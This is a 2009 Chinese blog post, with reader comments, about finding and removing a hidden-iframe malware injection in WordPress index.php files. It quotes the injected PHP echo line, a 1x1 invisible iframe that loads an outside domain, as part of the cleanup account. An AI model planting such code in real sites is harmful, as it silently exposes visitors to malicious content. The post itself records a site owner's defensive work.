西小西小崩哈子~
今天发现另外一个站也被挂马咯,原来做网站还要临此大敌,修炼~
前面xixiaoxi.com被挂马,西小西并没有发现端倪啊,今天闲来无事,跟你卯卯,呵呵~
1. 相遇。
今天我打开网站的时候,发现明明网页已经打开了,内容也都显示了,可是网页还在加载,奇怪~
仔细一看,原来网页加载隐藏链接呢,网站被挂马了。
总结下来呢,应该至少有三种方法可以检查网页是否被挂马。
(1)友情链接检查。你没主动挂上去的,那就是马被~
(2)全选网页,检查下有无隐藏链接。一般来讲,挂马的会把字的颜色和你页面的颜色设置成一样,掩人耳目。
(3)网页加载慢。而且加载内容与你网页内容不符。
2. 初识。
首先我打包下载了网站的程序,然后根据修改日期发现index.php文件被修改了。
\index.php
\wp-admin\index.php
\wp-content\themes\default\index.php 不同主题的index.php都被修改了。
代码为:
echo “<iframe src=\”http://rabetis.net/?click=1125DEA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
位置为:
<?php get_footer();
echo “<iframe src=\”http://rabetis.net/?click=114222F\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
?>
在初始的代码里红色部分是没有的。
我删除了以上index.php的代码,网站访问正常了。
3. 相约。
隐藏链接暂时性去除了,但是root cause并没有发现。挂马的人是如何获得权限的呢?
还有我发现,这个空间可以访问文件夹架构,马上联系IDC,看能禁止文件夹浏览不。
等待下一次被黑,只要黑的不是很彻底。
4. 求教。
路人甲路人乙叔叔大爷们啊,如果有克敌良方,尽请赐教,西小西在此谢过~
将反WordPress挂马|Wordpress隐藏链接进行到底!
7月 12th, 2009 at 12:17 下午
为什么喜欢挂你呢?
[回复]
西小西 回复:
7月 12th, 2009 at 12:19 下午
肯能是因为俺太弱了吧^^
[回复]
7月 12th, 2009 at 5:10 下午
是因为爱你才挂你吧
[回复]
西小西 回复:
7月 12th, 2009 at 10:16 下午
因为爱所以挂~
[回复]
7月 12th, 2009 at 7:10 下午
我服务器应该是硬防的,还算安全,不过数据库服务器老出毛病。
[回复]
7月 13th, 2009 at 9:53 上午
我的网站不流行,所以黑客们都看不上的。
[回复]
西小西 回复:
7月 13th, 2009 at 7:30 下午
呵呵,我想当黑客~然后黑你的网站,哈哈~
[回复]
7月 13th, 2009 at 3:35 下午
可能是你的歌迷干的!
[回复]
西小西 回复:
7月 13th, 2009 at 7:30 下午
哎,真拿歌迷没办法啊~
[回复]
7月 13th, 2009 at 6:29 下午
哈哈,挂马
[回复]
西小西 回复:
7月 13th, 2009 at 7:30 下午
咱不怕,呵呵
[回复]
7月 15th, 2009 at 8:59 上午
你丫强啊 !这你都能。
[回复]
8月 15th, 2009 at 11:38 下午
我和你一样的情况,我被挂N次了,我都快彻底崩溃了!准备换掉wordpress系统。好像是default-filters.php和default-widgets.php被修改了。我现在先尝试更改这些被修改的文件的权限为444。你有什么好的办法交流一下啊! icon_freak out 我也是国外的空间。
[回复]
西小西 回复:
8月 16th, 2009 at 9:34 上午
我最近还不错,没事了~
[回复]
9月 27th, 2010 at 10:37 下午
我上次也被挂马了,不过后来我分析知道大概是我FTP密码设置的太简单了
[回复]
1月 4th, 2011 at 7:52 下午
我一个朋友的网站给挂了黑链,删除后,接着又被加上。还加上一句“再删除我的链接,我删除你的全站“,这黑客真是没道德啊。
[回复]
西小西 回复:
1月 6th, 2011 at 12:55 下午
我的经常被黑,哈哈~
[回复]